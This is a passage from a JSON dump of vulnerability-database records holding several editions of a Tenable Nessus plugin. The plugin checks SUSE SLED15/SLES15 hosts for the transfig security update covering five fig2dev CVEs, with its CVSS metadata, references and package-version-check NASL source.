SP2/3\", os_ver + \" SP\" + sp);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n exists_check = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release && exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n else if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-25T05:02:48", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "SUSE_SU-2021-2454-1.NASL", "hash": "318f88c8871cc699009d26a1a6237e57", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, "href": "https://www.tenable.com/plugins/nessus/152022", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1159293", "http://www.nessus.org/u?9dd79152", "https://bugzilla.suse.com/1186329", "https://www.suse.com/security/cve/CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1143650"], "cvelist": ["CVE-2019-19746", "CVE-2019-19555", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19797"], "immutableFields": [], "lastseen": "2021-07-29T04:48:15", "history": [], "viewCount": 119, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["AL2_ALAS-2021-1682.NASL", "OPENSUSE-2020-1843.NASL", "FEDORA_2020-6A2824178E.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2021-2454.NASL", "OPENSUSE-2020-1702.NASL", "DEBIAN_DLA-2073.NASL", "AL2_ALAS-2020-1398.NASL", "SUSE_SU-2020-1806-1.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1702-1"]}, {"type": "cve", "idList": ["CVE-2021-3561", "CVE-2019-19746", "CVE-2019-14275", "CVE-2019-19797", "CVE-2019-19555"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2021-3561", "RH:CVE-2019-14275", "RH:CVE-2019-19746", "RH:CVE-2019-19797"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-19555", "UB:CVE-2019-14275", "UB:CVE-2019-19797", "UB:CVE-2019-19746", "UB:CVE-2021-3561"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877387", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310892073"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "fedora", "idList": ["FEDORA:9C4BF3072F18", "FEDORA:983DF624CFF6", "FEDORA:E540F6253477", "FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:B794B627F4F0"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-07-29T04:48:15", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-07-29T04:48:15", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152022", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152022);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2454-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009201.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9dd79152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n exists_check = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release && exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n else if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T04:48:15", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 2}, {"bulletin": {"id": "SUSE_SU-2021-2454-1.NASL", "hash": "9b59a136c84e8cd85ef7f0c83b948e1a", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152022", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1143650", "https://bugzilla.suse.com/1186329", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "https://bugzilla.suse.com/1159293", "https://www.suse.com/security/cve/CVE-2021-3561", "https://bugzilla.suse.com/1161698", "http://www.nessus.org/u?9dd79152", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://bugzilla.suse.com/1159130", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2019-19797"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-05T12:45:44", "history": [], "viewCount": 119, "enchantments": {"dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2073.NASL", "AL2_ALAS-2021-1682.NASL", "OPENSUSE-2020-1702.NASL", "FEDORA_2020-5D0F0593AE.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2020-1806-1.NASL", "AL2_ALAS-2020-1398.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL"]}, {"type": "cve", "idList": ["CVE-2019-19555", "CVE-2021-3561", "CVE-2019-19797", "CVE-2019-19746", "CVE-2019-14275"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19797", "RH:CVE-2019-19746", "RH:CVE-2021-3561", "RH:CVE-2019-14275", "RH:CVE-2019-19555"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2021-3561", "UB:CVE-2019-19746"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877387", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877368"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "fedora", "idList": ["FEDORA:E540F6253477", "FEDORA:20E71304CBA3", "FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18", "FEDORA:B794B627F4F0", "FEDORA:73FB862622DB"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-08-05T12:45:44", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-08-05T12:45:44", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152022", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152022);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2454-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : transfig (SUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009201.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9dd79152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'transfig-3.2.8a-4.12.2', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n exists_check = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release && exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n else if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": [], "solution": "Update the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": 